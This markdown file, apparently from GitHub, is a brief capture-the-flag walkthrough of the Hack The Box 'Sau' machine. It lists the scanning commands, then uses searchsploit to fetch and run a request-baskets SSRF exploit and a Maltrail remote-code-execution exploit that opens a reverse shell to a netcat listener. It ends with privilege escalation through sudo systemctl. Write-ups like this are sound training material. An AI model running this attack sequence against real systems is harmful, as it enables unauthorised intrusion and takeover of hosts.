Skip to content

Latest commit

 

History

History
73 lines (60 loc) · 2.59 KB

sau.md

File metadata and controls

73 lines (60 loc) · 2.59 KB
rustscan -a 10.10.11.224 -r 0-65535 --ulimit 5000

image

nmap -Pn -sC -sV -p 22,55555 10.10.11.224

image

HTTP 55555

http://10.10.11.224:55555/web

image image image image

Search Exploits image

Download Exploit

searchsploit -m python/webapps/51675.sh

image

Run Exploit

/51675.sh http://10.10.11.224:55555/ http://127.0.0.1:80/

image image

Search Exploits

searchsploit maltrail

image

Download Exploit

searchsploit -m python/webapps/51676.py

Start Netcat Listener

rlwrap nc -nlvvp 4444

Run Exploit

python3 51676.py 10.10.14.4 4444 http://10.10.11.224:55555/nmsxly

image image

Privilege Escalation

sudo -l

image

sudo systemctl status trail.service

image

Reference: https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-systemctl-privilege-escalation/ image

image